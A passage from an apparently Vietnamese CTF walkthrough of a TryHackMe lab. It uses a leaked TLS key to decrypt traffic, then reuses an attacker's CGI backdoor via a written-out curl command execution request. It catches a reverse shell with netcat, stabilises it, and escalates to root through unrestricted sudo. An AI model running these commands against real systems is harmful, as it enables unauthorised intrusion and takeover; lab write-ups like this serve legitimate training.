        ErrorLog /dev/null
        SSLEngine on
        SSLCipherSuite AES256-SHA
        SSLProtocol -all +TLSv1.2
        SSLCertificateFile /etc/apache2/certs/apache-certificate.crt
        SSLCertificateKeyFile /etc/apache2/certs/apache.key  # [!code highlight:1]
        ScriptAlias /cgi-bin/ /usr/lib/cgi-bin/
        AddHandler cgi-script .cgi .py .pl
        DocumentRoot /usr/lib/cgi-bin/
        <Directory "/usr/lib/cgi-bin">
                AllowOverride All 
                Options +ExecCGI -Multiviews +SymLinksIfOwnerMatch
                Order allow,deny
                Allow from all
        </Directory>
</VirtualHost>

Tải về và nhập key này vào giao thức TLS.

Reverse shell

Các gói tin đã được giải mã và mình tìm được một stream như sau:

Kẻ tấn công đã sử dụng file 5UP3r53Cr37.py và một số parameter khác, trong đó có cmd=id.

Kết quả trả về là kết quả của lệnh id.

Tận dụng điều này, mình gửi request tương tự như kẻ tấn công để xác nhận xem có khả thi hay không.

curl -k -s 'https://10.201.82.126:41312/cgi-bin/5UP3r53Cr37.py?key=48pfPHUrj4pmHzrC&iv=VZukhsCo8TlTXORN&cmd=id'

<h2>uid=33(www-data) gid=1003(h4ck3d) groups=1003(h4ck3d)
<h2>

# Tùy chọn -k: Cho phép thực hiện kết nối HTTPS mà không cần xác thực

Kết quả trả về cho thấy payload này hoàn toàn khả thi, mình thực hiện mở một reverse shell và vào được tài khoản www-data.

nc -lvnp 7304
listening on [any] 7304 ...
connect to [10.17.67.204] from (UNKNOWN) [10.201.82.126] 52184
bash: cannot set terminal process group (903): Inappropriate ioctl for device
bash: no job control in this shell
www-data@ubuntu:/usr/lib/cgi-bin$

Có shell rồi, mình sử dụng kỹ thuật Stabilizing để có thể tương tác shell linh hoạt hơn.

┌──(CloseUrEyes㉿CtrlZet)-[~/workspace/tryhackme/challenges/whyhackme]
└─$ nc -lvnp 7304
listening on [any] 7304 ...
connect to [10.17.67.204] from (UNKNOWN) [10.201.82.126] 52184
bash: cannot set terminal process group (903): Inappropriate ioctl for device
bash: no job control in this shell
www-data@ubuntu:/usr/lib/cgi-bin$ python3 -c 'import pty;pty.spawn("/bin/bash");'
<in$ python3 -c 'import pty;pty.spawn("/bin/bash");'
www-data@ubuntu:/usr/lib/cgi-bin$ export TERM=xterm
export TERM=xterm
www-data@ubuntu:/usr/lib/cgi-bin$ ^Z
zsh: suspended  nc -lvnp 7304
                                                                                                                                                             
┌──(CloseUrEyes㉿CtrlZet)-[~/workspace/tryhackme/challenges/whyhackme]
└─$ stty raw -echo; fg
[1]  + continued  nc -lvnp 7304

www-data@ubuntu:/usr/lib/cgi-bin$

Kiểm tra sudo như khi nãy thì thấy rằng tài khoản www-data có thể sử dụng lệnh sudo cho tất cả mọi thứ.

www-data@ubuntu:/usr/lib/cgi-bin$ sudo -l
Matching Defaults entries for www-data on ubuntu:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User www-data may run the following commands on ubuntu:
    (ALL : ALL) NOPASSWD: ALL

Truy cập người dùng root và flag

Sử dụng sudo su để chuyển sang tài khoản root, sau đó truy cập vào thư mục root sẽ có file chứa flag.